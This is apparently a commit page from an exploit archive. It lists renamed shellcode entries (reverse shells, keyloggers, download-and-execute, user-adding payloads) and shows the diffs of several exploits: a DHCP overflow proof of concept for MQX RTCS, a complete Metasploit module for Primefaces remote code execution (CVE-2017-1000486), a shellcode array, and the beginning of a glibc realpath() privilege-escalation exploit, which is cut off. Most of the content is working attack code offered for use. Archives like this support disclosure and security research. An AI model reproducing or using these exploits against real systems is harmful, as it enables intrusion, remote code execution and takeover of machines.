Windows - Keylogger to File (%TEMP%/log.bin) Null-Free Shellcode (601 bytes)
Windows - Keylogger to File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes)

Linux/x86-64 - execve() XOR Encoded Shellcode (84 bytes)
Linux/x86-64 - execve() + XOR Encoded Shellcode (84 bytes)

Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)
Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)
Windows x86 - system(_systeminfo_) Shellcode (224 bytes)
Windows XP < 10 - Download File + Execute Shellcode
Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)
Windows/x86 - system(systeminfo) Shellcode (224 bytes)
Windows (XP < 10) - Download File + Execute Shellcode
Windows/x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)

Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:10)  Xterm Shell Shellcode (68 bytes)
Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)
Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes)
Windows/x86 (7) - localhost Port Scanner Shellcode (556 bytes)
Linux/x86 - Bind TCP/UDP (98/TCP + UDP) Netcat Shell Shellcode (44/52 bytes)
Windows x86 - MessageBoxA Shellcode (242 bytes)
Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)
Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter Shellcode (157 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{shadow_passwd} Shellcode (358 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{shadow_passwd} Shellcode (273 bytes)
Windows/x86 - MessageBoxA Shellcode (242 bytes)
Windows/x86 - CreateProcessA cmd.exe Shellcode (253 bytes)
Windows/x86 - InitiateSystemShutdownA() Shellcode (599 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes)

Linux/x86-64 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)
Linux/x86-64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)

OSX/PPC - Stager Sock Find MSG_PEEK Shellcode
OSX/PPC - Stager Sock Find MSG_PEEK + Null-Free Shellcode

OSX/PPC - execve(/bin/sh) Shellcode
OSX/PPC - execve(/bin/sh) + Null-Free Shellcode

Linux/x86 - socket-proxy Shellcode (372 bytes) (Generator)
Linux/x86 - Socket-proxy Shellcode (372 bytes) (Generator)
Linux/x86 - rmdir(_/tmp/willdeleted_) Shellcode (41 bytes)
Linux/x86 - setdomainname(_th1s s3rv3r h4s b33n h1j4ck3d !!_) Shellcode (58 bytes)
Linux/x86 - rmdir(/tmp/willdeleted) Shellcode (41 bytes)
Linux/x86 - setdomainname(th1s s3rv3r h4s b33n h1j4ck3d !!) Shellcode (58 bytes)

Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3)
Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (5)
Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3)
Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) Shellcode (103 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell Shellcode (72 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (65 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method Shellcode (89 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell Shellcode (73 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)
Linux/x86 - Egghunter Shellcode (38 bytes)
Windows x64 - cmd.exe WinExec() Shellcode (93 bytes)
Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)
Windows x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) + Null-Free Shellcode (103 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell + Null-Free Shellcode (72 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (65 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method + Null-Free Shellcode (89 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell + Null-Free Shellcode (73 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)
Linux/x86 - Egghunter (0x50905090) + Null-Free Shellcode (38 bytes)
Linux/x86 - execve(/bin/sh) + Null-Free Shellcode (21 bytes) (6)
Linux/x86 - Read /etc/passwd file + Null-Free Shellcode (51 bytes)
Linux/x86 - Reboot() + Mutated + Null-Free Shellcode (55 bytes)
Linux/x86 - Fork Bomb + Mutated + Null-Free Shellcode (15 bytes)
Linux/x86 - execve wget + Mutated + Null-Free Shellcode (96 bytes)
Linux/x86 - execve(/bin/sh) + Uzumaki Encoded + Null-Free Shellcode (50 bytes)
Linux/x86 - Uzumaki Encryptor Shellcode (Generator)
Linux/x86 - Bind TCP (31337/TCP) Shell Shellcode (108 bytes)
Linux/x86 - /proc/sys/net/ipv4/ip_forward 0 + exit() Shellcode (83 bytes)
Linux/x86 - Egghunter (0x5090) Shellcode (38 bytes)
Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (30 bytes)
Linux/x86 - Bind TCP Shell Shellcode (112 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:12345/TCP) cat /etc/passwd Shellcode (111 bytes)
Linux/x86 - Download File (http://192.168.2.222/x) + chmod() + execute Shellcode (108 bytes)
Linux/x86 - execve(/bin/sh) + Using jump/call/pop Shellcode (52 bytes)
Linux/x86 - Copy /etc/passwd to /tmp/outfile Shellcode (97 bytes)
Linux/x86 - shift-bit execve() Encoder Shellcode (114 bytes)
Linux/x86 - execve() Using  JMP-FSTENV Shellcode (67 bytes)
Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (51 bytes)
Linux/x86 - shutdown -h now Shellcode (56 bytes)
Linux/x86 - Bind TCP (1337/TCP) Shell Shellcode (89 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:1337/TCP) Shell Shellcode (74 bytes)
Linux/x86 - setreuid() + execve(/usr/bin/python) Shellcode (54 bytes)
Linux/x86 - execve() + ROT-7  Shellcode (Encoder/Decoder)  (74 bytes)
Windows/x86 (NT/XP/2000/2003) - Bind TCP (8721/TCP) Shell Shellcode (356 bytes)
Windows/x86 (2000) - Reverse TCP (192.168.0.247:8721/TCP) Connect + Vampiric Import Shellcode (179 bytes)
Windows/x86 - Create Admin User (X) Shellcode (304 bytes)
Windows/x86 (XP SP3) (French) - Sleep 90 Seconds Shellcode (14 bytes)
Windows/x86 (XP Professional SP2) (English) - Wordpad Shellcode (15 bytes)
Windows/x86 (XP Professional SP2) - calc Shellcode (57 bytes)
Windows/x86 (XP Professional SP3) (French) - calc.exe Shellcode (31 bytes)
Windows/x86 - Download File (http://skypher.com/dll) + LoadLibrary + Null-Free Shellcode (164 bytes)
Windows/x86 - calc.exe + Null-Free Shellcode (100 bytes)
Windows/x86 - Message Box + Null-Free Shellcode (140 bytes)
Windows/x86 (XP SP3) (Turkish) - MessageBoxA Shellcode (109 bytes)
Windows/x86 (XP SP3) (Turkish) - calc.exe Shellcode (53 bytes)
Windows/x86 (XP SP3) (Turkish) - cmd.exe Shellcode (52 bytes)
Windows/x86 (XP SP3) (Turkish) - cmd.exe Shellcode (42 bytes)
Windows/x86 (XP SP3) (English) - calc Shellcode (16 bytes)
Windows/x86 (XP SP3) - MessageBox Shellcode (11 bytes)
Windows/x86-64 - cmd.exe WinExec() Shellcode (93 bytes)
Windows/x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)
Windows/x86-64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)
Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)
Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)
Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution Null-Free Shellcode (72 bytes)
Windows x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)
Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)
Linux/x86-64 - mkdir Shellcode (25 bytes)
Windows/x86-64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)
Linux/x86 - Reverse TCP Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)
Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution + Null-Free Shellcode (72 bytes)
Windows/x86-64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)
Windows/x86-64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)
Linux/x86-64 - mkdir() Shellcode (25 bytes)

Windows x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)
Windows/x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)
Linux/x86-64 - Egghunter Shellcode (38 bytes)
Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes)
Linux/x86-64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes)
Windows/x86 - Executable Directory Search + Null-Free Shellcode (130 bytes)

Windows x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)
Windows/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)

Windows x86 - Hide Console Window Shellcode (182 bytes)
Windows/x86 - Hide Console Window Shellcode (182 bytes)

Linux/ARM - chmod(_/etc/passwd__ 0777) Shellcode (39 bytes)
Linux/ARM - chmod( /etc/passwd 0777) Shellcode (39 bytes)

Linux/SPARC - setreuid(0_0) + standard execve() Shellcode (72 bytes)
Linux/SPARC - setreuid(0_0) + execve() Shellcode (72 bytes)

Linux/x86-64 - sys_access() Egghunter Shellcode (49 bytes)
Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) +  Egghunter Using sys_access() Shellcode (49 bytes)

Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes)
Linux/x86 - exceve(/bin/sh) + Encoded Shellcode (44 bytes)

Linux/x86 - Insertion Decoder + Null-Free Shellcode (33+ bytes)

Windows 10 x64 - Egghunter Shellcode (45 bytes)
Windows/x86-64 (10) - Egghunter Shellcode (45 bytes)

Linux/x86 - Egghunter Shellcode (18 bytes)
Linux/x86 - Egghunter (0x50905090) + /bin/sh Shellcode (18 bytes)

Windows x86/x64 - cmd.exe Shellcode (718 bytes)
Windows/x86-64 / x86 - cmd.exe Shellcode (718 bytes)

Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)
Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) + XOR Encoded Shellcode (66 bytes)

Linux/x86 - execve(/bin/sh) Shellcode (24 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (4)

Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes)
Linux/x86-64 - mkdir(evil) Shellcode (30 bytes)

Windows x64 - API Hooking Shellcode (117 bytes)
Windows/x86-64 - API Hooking Shellcode (117 bytes)
This commit is contained in:
Offensive Security 2018-01-19 05:01:43 +00:00
parent 1db36d5e8b
commit 8a2e4ff27a
57 changed files with 4507 additions and 286 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
exploits/cgi/webapps/922.pl
View file

@ -3,7 +3,7 @@
############################################################
# Target - The Includer CGI <= 1.0 #
# #
# Based on - http://www.milw0rm.com/id.php?id=862 #
# Based on - http://www.milw0rm.com/id.php?id=862 (https://www.exploit-db.com/exploits/862/) #
# #
# Info about bug - Stupid use "Open" function. #
# #

63
exploits/hardware/dos/43776.py Executable file
View file

@ -0,0 +1,63 @@
#!/usr/bin/python3
"""PoC for MQX RTCS code execution via DHCP options overflow.
This is just a quick hack to prove the vulnerability and was designed to run
on a private network with the target device.
"""
import datetime
import socket
def main():
"""Use a default valid DHCP packet to overwrite an event function pointer."""
execute_addr = 0xFFFFFFFF
exploit_pkt = bytearray.fromhex(' \
02 01 06 00 a5 d3 0b 2f 00 00 80 00 00 00 00 00 \
ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff \
ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 63 82 53 63 \
35 01 02 36 04 ff ff ff ff 01 04 ff ff ff 00 43 \
98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 ff ff ff ff ff')
exploit_pkt[0x195:0x199] = execute_addr.to_bytes(4, byteorder='big')
recv_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
recv_sock.bind(('', 67))
send_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
send_sock.bind(('', 68))
send_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
send_sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
while True:
print("{}: Waiting for DHCP packet...".format(datetime.datetime.now()))
# Transaction IDs need to match else RTCS will throw out the packet.
data = recv_sock.recvfrom(1024)[0]
exploit_pkt[4:8] = data[4:8]
send_sock.sendto(exploit_pkt, ('<broadcast>', 68))
print("{}: Transmitted 0x{:X} PC redirection packet.".format(
datetime.datetime.now(), execute_addr))
if __name__ == "__main__":
main()

156
exploits/java/webapps/43733.rb Executable file
View file

@ -0,0 +1,156 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'CVE-2017-1000486 Primefaces Remote Code Execution Exploit',
'Description' => %q{
This module exploits an expression language remote code execution flaw in the Primefaces JSF framework.
Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack, due to the use of weak crypto and default encryption password and salt.
},
'Author' => [ 'Bjoern Schuette' ],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', 'CVE-2017-1000486'],
['URL', 'http://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html'],
['URL', 'https://cryptosense.com/weak-encryption-flaw-in-primefaces/'],
['URL', 'http://schuette.se/2018/01/16/in-your-primeface/']
],
'Privileged' => true,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
'DefaultOptions' =>
{
'WfsDelay' => 30
},
'DisclosureDate' => 'Feb 15 2016',
'Platform' => ['unix', 'bsd', 'linux', 'osx', 'win'],
'Arch' => ARCH_CMD,
'Targets' => [
[
'Universal', {
'Platform' => ['unix', 'bsd', 'linux', 'osx', 'win'],
'Arch' => [ ARCH_CMD ],
},
],
],
'DefaultTarget' => 0))
register_options([
Opt::RPORT(80),
OptString.new('PASSWORD', [ true , "The password to login", 'primefaces']),
OptString.new('TARGETURI', [true, 'The base path to primefaces', '/javax.faces.resource/dynamiccontent.properties.xhtml']) ,
OptString.new('CMD', [ false , "Command to execute", '']),
])
end
def encrypt_el(password, payload)
salt = [0xa9, 0x9b, 0xc8, 0x32, 0x56, 0x34, 0xe3, 0x03].pack('c*')
iterationCount = 19
cipher = OpenSSL::Cipher.new("DES")
cipher.encrypt
cipher.pkcs5_keyivgen password, salt, iterationCount
ciphertext = cipher.update payload
ciphertext << cipher.final
return ciphertext
end
def http_send_command(cmd, payloadEL)
uri = normalize_uri(target_uri.path)
encrypted_payload = encrypt_el(datastore['PASSWORD'], payloadEL)
encrypted_payload_base64 = Rex::Text.encode_base64(encrypted_payload)
encrypted_payload_base64_url_encoded = Rex::Text.uri_encode(encrypted_payload_base64)
# send the payload and execute command
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_post' => {
'pfdrt' => 'sc',
'ln' => 'primefaces',
'pfdrid' => encrypted_payload_base64_url_encoded
}
})
if res.nil?
vprint_error("Connection timed out")
fail_with(Failure::Unknown, "Failed to trigger the Enter button")
end
if res && res.headers && (res.code == 302 || res.code == 200)
print_good("HTTP return code #{res.code}")
else
vprint_error(res.body)
fail_with(Failure::Unknown, "#{peer} - Unknown error during execution")
end
return res
end
def exploit
cmd=""
if not datastore['CMD'].empty?
cmd = datastore['CMD']
else
cmd = payload.encoded
end
payloadEL = '${facesContext.getExternalContext().getResponse().setContentType("text/plain;charset=\"UTF-8\"")}'
payloadEL << '${session.setAttribute("scriptfactory","".getClass().forName("javax.script.ScriptEngineManager").newInstance())}'
payloadEL << '${session.setAttribute("scriptengine",session.getAttribute("scriptfactory").getEngineByName("JavaScript"))}'
payloadEL << '${session.getAttribute("scriptengine").getContext().setWriter(facesContext.getExternalContext().getResponse().getWriter())}'
payloadEL << '${session.getAttribute("scriptengine").eval('
payloadEL << '"var os = java.lang.System.getProperty(\"os.name\");'
payloadEL << 'var proc = null;'
payloadEL << 'os.toLowerCase().contains(\"win\")? '
payloadEL << 'proc = new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"cmd.exe\",\"/C\",\"%s\"]).start()' % cmd
payloadEL << ' : proc = new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"/bin/sh\",\"-c\",\"%s\"]).start();' % cmd
payloadEL << 'var is = proc.getInputStream();'
payloadEL << 'var sc = new java.util.Scanner(is,\"UTF-8\"); var out = \"\";'
payloadEL << 'while(sc.hasNext()) {out += sc.nextLine()+String.fromCharCode(10);}print(out);")}'
payloadEL << '${facesContext.getExternalContext().getResponse().getWriter().flush()}'
payloadEL << '${facesContext.getExternalContext().getResponse().getWriter().close()}';
vprint_status("Attempting to execute: #{cmd}")
resp = http_send_command(cmd, payloadEL)
print_line(resp.body.to_s)
m = resp.body.to_s
if m.empty?
print_error("This server may not be vulnerable")
end
return
end
def check
var_a = rand_text_alpha_lower(4)
payloadEL = "${facesContext.getExternalContext().setResponseHeader(\"primesecretchk\", %s" % var_a
res = http_send_command(var_a, payloadEL)
if res.headers
if res.headers["primesecretchk"] == #{var_a}
vprint_good("Victim evaluates EL expressions")
return Exploit::CheckCode::Vulnerable
end
else
vprint_error("Unable to determine due to a HTTP connection timeout")
return Exploit::CheckCode::Unknown
end
return Exploit::CheckCode::Safe
end
end

2
exploits/linux/local/1215.c
View file

@ -5,7 +5,7 @@
#include <unistd.h>
#include <stdlib.h>
/* 45 Byte /bin/sh >> http://www.milw0rm.com/id.php?id=1169 */
/* 45 Byte /bin/sh >> http://www.milw0rm.com/id.php?id=1169 (https://www.exploit-db.com/exploits/1169/) */
char shellcode[]=
"\x31\xc0\x31\xdb\x50\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89"

977
exploits/linux/local/43775.c Normal file
View file

@ -0,0 +1,977 @@
/** This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* Copyright (c) 2018 halfdog <me (%) halfdog.net>
* See https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/ for more information.
*
* This tool exploits a buffer underflow in glibc realpath()
* and was tested against latest release from Debian, Ubuntu
* Mint. It is intended as demonstration of ASLR-aware exploitation
* techniques. It uses relative binary offsets, that may be different
* for various Linux distributions and builds. Please send me
* a patch when you developed a new set of parameters to add
* to the osSpecificExploitDataList structure and want to contribute
* them.
*
* Compile: gcc -o RationalLove RationalLove.c
* Run: ./RationalLove
*
* You may also use "--Pid" parameter, if you want to test the
* program on already existing namespaced or chrooted mounts.
*/
#define _GNU_SOURCE
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <poll.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#define UMOUNT_ENV_VAR_COUNT 256
/** Dump that number of bytes from stack to perform anti-ASLR.
* This number should be high enough to reproducible reach the
* stack region sprayed with (UMOUNT_ENV_VAR_COUNT*8) bytes of
* environment variable references but low enough to avoid hitting
* upper stack limit, which would cause a crash.
*/
#define STACK_LONG_DUMP_BYTES 4096
char *messageCataloguePreamble="Language: en\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n";
/** The pid of a namespace process with the working directory
* at a writable /tmp only visible by the process. */
pid_t namespacedProcessPid=-1;
int killNamespacedProcessFlag=1;
/** The pathname to the umount binary to execute. */
char *umountPathname;
/** The pathname to the named pipe, that will synchronize umount
* binary with supervisory process before triggering the second
* and last exploitation phase.
*/
char *secondPhaseTriggerPipePathname;
/** The pathname to the second phase exploitation catalogue file.
* This is needed as the catalogue cannot be sent via the trigger
* pipe from above.
*/
char *secondPhaseCataloguePathname;
/** The OS-release detected via /etc/os-release. */
char *osRelease=NULL;
/** This table contains all relevant information to adapt the
* attack to supported Linux distros (fully updated) to support
* also older versions, hash of umount/libc/libmount should be
* used also for lookups.
* The 4th string is an array of 4-byte integers with the offset
* values for format string generation. Values specify:
* * Stack position (in 8 byte words) for **argv
* * Stack position of argv[0]
* * Offset from __libc_start_main return position from main()
* and system() function, first instruction after last sigprocmask()
* before execve call.
*/
#define ED_STACK_OFFSET_CTX 0
#define ED_STACK_OFFSET_ARGV 1
#define ED_STACK_OFFSET_ARG0 2
#define ED_LIBC_GETDATE_DELTA 3
#define ED_LIBC_EXECL_DELTA 4
static char* osSpecificExploitDataList[]={
// Debian Stretch
"\"9 (stretch)\"",
"../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A",
"from_archive",
// Delta for Debian Stretch "2.24-11+deb9u1"
"\x06\0\0\0\x24\0\0\0\x3e\0\0\0\x7f\xb9\x08\x00\x4f\x86\x09\x00",
// Ubuntu Xenial libc=2.23-0ubuntu9
"\"16.04.3 LTS (Xenial Xerus)\"",
"../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A",
"_nl_load_locale_from_archive",
"\x07\0\0\0\x26\0\0\0\x40\0\0\0\xd0\xf5\x09\x00\xf0\xc1\x0a\x00",
// Linux Mint 18.3 Sylvia - same parameters as "Ubuntu Xenial"
"\"18.3 (Sylvia)\"",
"../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A",
"_nl_load_locale_from_archive",
"\x07\0\0\0\x26\0\0\0\x40\0\0\0\xd0\xf5\x09\x00\xf0\xc1\x0a\x00",
NULL};
char **osReleaseExploitData=NULL;
/** Locate the umount binary within the given search path list,
* elements separated by colons.
* @return a pointer to a malloced memory region containing the
* string or NULL if not found.
*/
char* findUmountBinaryPathname(char *searchPath) {
char *testPathName=(char*)malloc(PATH_MAX);
assert(testPathName);
while(*searchPath) {
char *endPtr=strchr(searchPath, ':');
int length=endPtr-searchPath;
if(!endPtr) {
length=strlen(searchPath);
endPtr=searchPath+length-1;
}
int result=snprintf(testPathName, PATH_MAX, "%.*s/%s", length,
searchPath, "umount");
if(result>=PATH_MAX) {
fprintf(stderr, "Binary search path element too long, ignoring it.\n");
} else {
struct stat statBuf;
result=stat(testPathName, &statBuf);
// Just assume, that umount is owner-executable. There might be
// alternative ACLs, which grant umount execution only to selected
// groups, but it would be unusual to have different variants
// of umount located searchpath on the same host.
if((!result)&&(S_ISREG(statBuf.st_mode))&&(statBuf.st_mode&S_IXUSR)) {
return(testPathName);
}
}
searchPath=endPtr+1;
}
free(testPathName);
return(NULL);
}
/** Get the value for a given field name.
* @return NULL if not found, a malloced string otherwise.
*/
char* getReleaseFileField(char *releaseData, int dataLength, char *fieldName) {
int nameLength=strlen(fieldName);
while(dataLength>0) {
char *nextPos=memchr(releaseData, '\n', dataLength);
int lineLength=dataLength;
if(nextPos) {
lineLength=nextPos-releaseData;
nextPos++;
} else {
nextPos=releaseData+dataLength;
}
if((!strncmp(releaseData, fieldName, nameLength))&&
(releaseData[nameLength]=='=')) {
return(strndup(releaseData+nameLength+1, lineLength-nameLength-1));
}
releaseData=nextPos;
dataLength-=lineLength;
}
return(NULL);
}
/** Detect the release by reading the VERSION field from /etc/os-release.
* @return 0 on success.
*/
int detectOsRelease() {
int handle=open("/etc/os-release", O_RDONLY);
if(handle<0)
return(-1);
char *buffer=alloca(1024);
int infoLength=read(handle, buffer, 1024);
close(handle);
if(infoLength<0)
return(-1);
osRelease=getReleaseFileField(buffer, infoLength, "VERSION");
if(!osRelease)
osRelease=getReleaseFileField(buffer, infoLength, "NAME");
if(osRelease) {
fprintf(stderr, "Detected OS version: %s\n", osRelease);
return(0);
}
return(-1);
}
/** Create the catalogue data in memory.
* @return a pointer to newly allocated catalogue data memory
*/
char* createMessageCatalogueData(char **origStringList, char **transStringList,
int stringCount, int *catalogueDataLength) {
int contentLength=strlen(messageCataloguePreamble)+2;
for(int stringPos=0; stringPos<stringCount; stringPos++) {
contentLength+=strlen(origStringList[stringPos])+
strlen(transStringList[stringPos])+2;
}
int preambleLength=(0x1c+0x14*(stringCount+1)+0xc)&-0xf;
char *catalogueData=(char*)malloc(preambleLength+contentLength);
memset(catalogueData, 0, preambleLength);
int *preambleData=(int*)catalogueData;
*preambleData++=0x950412de;
preambleData++;
*preambleData++=stringCount+1;
*preambleData++=0x1c;
*preambleData++=(*(preambleData-2))+(stringCount+1)*sizeof(int)*2;
*preambleData++=0x5;
*preambleData++=(*(preambleData-3))+(stringCount+1)*sizeof(int)*2;
char *nextCatalogueStringStart=catalogueData+preambleLength;
for(int stringPos=-1; stringPos<stringCount; stringPos++) {
char *writeString=(stringPos<0)?"":origStringList[stringPos];
int length=strlen(writeString);
*preambleData++=length;
*preambleData++=(nextCatalogueStringStart-catalogueData);
memcpy(nextCatalogueStringStart, writeString, length+1);
nextCatalogueStringStart+=length+1;
}
for(int stringPos=-1; stringPos<stringCount; stringPos++) {
char *writeString=(stringPos<0)?messageCataloguePreamble:transStringList[stringPos];
int length=strlen(writeString);
*preambleData++=length;
*preambleData++=(nextCatalogueStringStart-catalogueData);
memcpy(nextCatalogueStringStart, writeString, length+1);
nextCatalogueStringStart+=length+1;
}
assert(nextCatalogueStringStart-catalogueData==preambleLength+contentLength);
for(int stringPos=0; stringPos<=stringCount+1; stringPos++) {
// *preambleData++=(stringPos+1);
*preambleData++=(int[]){1, 3, 2, 0, 4}[stringPos];
}
*catalogueDataLength=preambleLength+contentLength;
return(catalogueData);
}
/** Create the catalogue data from the string lists and write
* it to the given file.
* @return 0 on success.
*/
int writeMessageCatalogue(char *pathName, char **origStringList,
char **transStringList, int stringCount) {
int catalogueFd=open(pathName, O_WRONLY|O_CREAT|O_TRUNC|O_NOCTTY, 0644);
if(catalogueFd<0) {
fprintf(stderr, "Failed to open catalogue file %s for writing.\n",
pathName);
return(-1);
}
int catalogueDataLength;
char *catalogueData=createMessageCatalogueData(
origStringList, transStringList, stringCount, &catalogueDataLength);
